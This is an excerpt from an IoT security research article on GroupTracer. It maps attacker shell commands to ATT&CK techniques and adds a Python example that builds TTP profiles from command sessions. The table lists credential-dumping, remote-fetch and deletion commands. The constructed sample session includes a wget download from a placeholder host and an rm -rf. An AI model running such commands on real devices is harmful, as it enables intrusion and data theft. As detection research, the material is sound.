Research Article
GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things
Table 1
Some examples of mapping from commands to TTP profiles.
| Knowledge base | Command | Technique | Tactic |
| --- | --- | --- | --- |
| 1st knowledge base | show running-config | Credential dumping | Credential access |
| 1st knowledge base | show startup-config | Credential dumping | Credential access |
| 2nd knowledge base | ftpget | Remote file copy | Lateral movement |
| 2nd knowledge base | wget | Remote file copy | Lateral movement |
| 2nd knowledge base | curl | Remote file copy | Lateral movement |
| 2nd knowledge base | rcp | Remote file copy | Lateral movement |
| 2nd knowledge base | copy | Remote file copy | Lateral movement |
| 2nd knowledge base | show archive config | Credentials in files | Credential access |
| 2nd knowledge base | show history | Input capture | Collection |
| 2nd knowledge base | show logging | Input capture | Collection |
| 2nd knowledge base | tar | Data compressed | Exfiltration |
| 2nd knowledge base | zip | Data compressed | Exfiltration |
| 2nd knowledge base | rar | Data compressed | Exfiltration |
| 2nd knowledge base | shutdown | System shutdown/reboot | Impact |
| 2nd knowledge base | reboot | System shutdown/reboot | Impact |
| 2nd knowledge base | del | File deletion | Defense evasion |
| 2nd knowledge base | rm | File deletion | Defense evasion |
| 2nd knowledge base | adduser | Create account | Persistence |
| 2nd knowledge base | usermod | Account manipulation | Persistence |
| 2nd knowledge base | groupadd | Account manipulation | Persistence |
| 2nd knowledge base | dir | File and directory discovery | Discovery |
| 2nd knowledge base | ls | File and directory discovery | Discovery |
| 2nd knowledge base | cd | File and directory discovery | Discovery |
| 2nd knowledge base | echo | Data from local system | Collection |
| 2nd knowledge base | cat | Data from local system | Collection |
| 2nd knowledge base | more | Data from local system | Collection |
| 2nd knowledge base | pwd | Data from local system | Collection |
| 2nd knowledge base | whoami | Data from local system | Collection |
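As an added example (not the GroupTracer authors' code), the mapping in Table 1 applied to a captured command session to produce the per-tactic and per-technique counts that form an attacker's TTP profile. The sample session, the splitting on shell separators and the dropping of a path prefix on the program name are this example's own assumptions, not part of the paper.

```python
import re
from collections import Counter

# (technique, tactic) per command, transcribed from Table 1.
TTP_MAP = {
    "show running-config": ("Credential dumping", "Credential access"),
    "show startup-config": ("Credential dumping", "Credential access"),
    "show archive config": ("Credentials in files", "Credential access"),
    "show history": ("Input capture", "Collection"),
    "show logging": ("Input capture", "Collection"),
    "adduser": ("Create account", "Persistence"),
}
for _cmds, _tt in [
    (("ftpget", "wget", "curl", "rcp", "copy"), ("Remote file copy", "Lateral movement")),
    (("tar", "zip", "rar"), ("Data compressed", "Exfiltration")),
    (("shutdown", "reboot"), ("System shutdown/reboot", "Impact")),
    (("del", "rm"), ("File deletion", "Defense evasion")),
    (("usermod", "groupadd"), ("Account manipulation", "Persistence")),
    (("dir", "ls", "cd"), ("File and directory discovery", "Discovery")),
    (("echo", "cat", "more", "pwd", "whoami"), ("Data from local system", "Collection")),
]:
    TTP_MAP.update(dict.fromkeys(_cmds, _tt))
_MAX_WORDS = max(len(k.split()) for k in TTP_MAP)  # longest multi-word command in the table

def split_commands(session):
    """One command per line, also split on ; && || | so 'cd /tmp && wget x' yields two."""
    parts = (p for line in session.splitlines()
             for p in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line.strip()))
    return [p for p in parts if p]

def map_command(cmd):
    """(technique, tactic) for one command, else None. Longest leading token run
    wins, so 'show archive config' is matched whole, not as 'show' + arguments."""
    tokens = cmd.split() or [""]
    tokens[0] = tokens[0].rsplit("/", 1)[-1]  # /usr/bin/wget -> wget (this example's assumption)
    for n in range(min(_MAX_WORDS, len(tokens)), 0, -1):
        hit = TTP_MAP.get(" ".join(tokens[:n]))
        if hit:
            return hit
    return None

def ttp_profile(session):
    """Per-tactic and per-technique counts for a session: the attacker's TTP profile."""
    hits = [h for h in map(map_command, split_commands(session)) if h]
    return {"tactics": Counter(t for _, t in hits),
            "techniques": Counter(tech for tech, _ in hits), "mapped": len(hits)}

# Constructed sample session (not captured data).
SAMPLE_SESSION = "cd /tmp; /usr/bin/wget http://example.invalid/x\ncat /proc/cpuinfo | more\nshow running-config\nrm -rf x"
```

Commands absent from the table (for example `show version`) are simply not counted, so the profile only reflects the knowledge base's coverage.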